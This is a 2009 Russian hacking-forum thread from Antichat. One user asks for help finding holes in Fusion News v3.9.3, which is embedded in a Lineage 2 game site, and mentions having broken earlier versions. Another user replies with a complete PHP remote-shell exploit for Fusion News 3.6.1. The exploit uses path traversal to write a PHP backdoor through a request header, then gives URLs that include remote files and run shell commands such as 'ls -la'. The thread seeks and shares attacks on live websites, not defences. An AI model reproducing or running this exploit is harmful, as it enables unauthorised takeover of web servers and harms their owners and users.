ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Fusion News
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Fusion News
  #1  
Старый 19.02.2009, 05:38
Аватар для NamahS
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию Fusion News
Всем доброго времени суток!)
Может сталкивался кто с новостной системой Fusion News...???
В Инете не нашел ничего про нее...в смысле багов)
Если интересно кому, то встроена она в ВЕБ обвязку
Скачать (Дамп):
http://dump.ru/file/1466503
Зеркало (Рапида):
http://www.rapidshare.ru/903566
Пароль:
www.la2base.ru



Powered by Fusion News v3.9.3
 
Ответить с цитированием

  #2  
Старый 19.02.2009, 05:42
Аватар для it's mу
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию
что-то я не понял смысл темы
 
Ответить с цитированием

  #3  
Старый 19.02.2009, 05:43
Аватар для NamahS
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию
Никакого смысла, просто прошу помочь в поиске уязвимостей
 
Ответить с цитированием

  #4  
Старый 19.02.2009, 05:47
Аватар для it's mу
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию
если я не ошибаюсь то в архиве, что ты выложил РИП какого-то сайта игры Leanage2 посмотрим
 
Ответить с цитированием

  #5  
Старый 19.02.2009, 05:54
Аватар для NamahS
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию
Да, L2 )))
Ковырял другие версии и все нормально было)
...там стоял Cutenews 1.4.5 ))) А теперь начали встраивать 1.4.6 (...он не ломается гад)...а теперь еще Fusion какой-то)
 
Ответить с цитированием

  #6  
Старый 19.02.2009, 06:03
Аватар для it's mу
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию
есть от NST сплоит под 3.6.1
Код:
<font color=RED>
<?
$copyr = "
!!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!!

oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888
.88...8888.........888....888
o88o....88.o88oooo888....o888o
********************************
**** Network security team *****
********* nst.void.ru **********
********************************
* Title: Fusion News v3.6.1
* Date: 15.05.2005
********************************

Remote shell exploit.

Google:
allintitle:f u s i o n : n e w s : m a n a g e m e n t : s y s t e m

Script owner: www.fusionphp.net

*** Exploit contains anti-script kidis trick. ***
Count: 4

Greetz to: GHC, RST, LWB, AntiChat, VOID, Web-Hack, Securitylab, Security.nnov, Securityfocus

Visit all our friends:
Rus:
ghc.ru
rst.void.ru
lwb57.org
antichat.ru
void.ru
web-hack.ru
securitylab.ru
security.nnov.ru
Eng:
securityfocus.com

Greentz to Ch0k37 from gh0sts, which wants to purchase this exploit but he was too greedy.

!!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!!

*** Public: 17.05.2005 ***
";

# CONFIG                       (example: http://www.site.com/news/)
$host   = "www.site.com";       # address - example: www.site.com
$folder = "folder/to/fusion";   # folder - example: news
# END OF CONFIG


$fp = fsockopen($host, 80);
$data = "name=nst&email=&fullnews=nst&chars=297&com_Submit*=Submit&pa ss=";
$out = "POST /$folder/comments.php?mid=post&id=/../../templates/headline_ temp HTTP/1.1\r\n";
$out.= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*\r\n";
$out.= "Referer: http://$host/\r\n";
$out.= "Accept-Language: ru\r\n";
$out.= "X-FORWORDEDFOR: <?@include($_GET[nst_inc>);@passthru($_GET[nst_cmd>);?> ;\r\n";
$out.= "Content-Type: application/x-www-form-urlencoded\r\n";
$out.= "Accept-Encoding: gzip, deflate\r\n";
$out.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n";
$out.= "Host: $hots\r\n";
$out.= "Content-Length: 64\r\n";
$out.= "Connection: Keep-Alive\r\n";
$out.= "Cache-Control: no-cache\r\n";
$out.= "\r\n";
$out.= "name=test&email=&fullnews=test&chars=297&com_Subm*it=Submit& pass=";
fputs($fp,$out);
while(!feof($fp)){
fgets($fp, 128);
}
print "<pre>";
print $copyr;
print "\r\n\r\n <b>
Result:

http://$host/$folder/templates/headline_temp.php?nst_inc=htt p://YOUR_FILE \r\n";
print "http://$host/$folder/templates/headline_temp.php?nst_cmd=ls -la";
?>
</font>
Вот официальный релиз от производителей: http://puzzle.dl.sourceforge.net/sourceforge/fnews/fusionnews-3.9.4.zip
Последний раз редактировалось it's mу; 19.02.2009 в 06:05..
 
Ответить с цитированием

  #7  
Старый 19.02.2009, 06:20
Аватар для NamahS
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию
На 3.6.1 нашел)...старый он)Тут стоит Fusion News v3.9.3
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL инъекция (в т.ч. и blind SQL) kot777 Уязвимости 4 04.10.2008 17:18
MySpace и News Corp. обвинены в изнасилованиях †Nood1e† Мировые новости 13 21.01.2007 17:51
Основатель MySpace подает в суд на News Corp SK | Heaton Мировые новости 0 08.11.2006 07:17
News on the startpage Koobi 4.2.4 jackman Forum for discussion of ANTICHAT 5 29.08.2006 09:21
Киберпреступники заманивают жертв на подставной сайт BBC News... Allen Мировые новости 0 05.04.2006 16:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ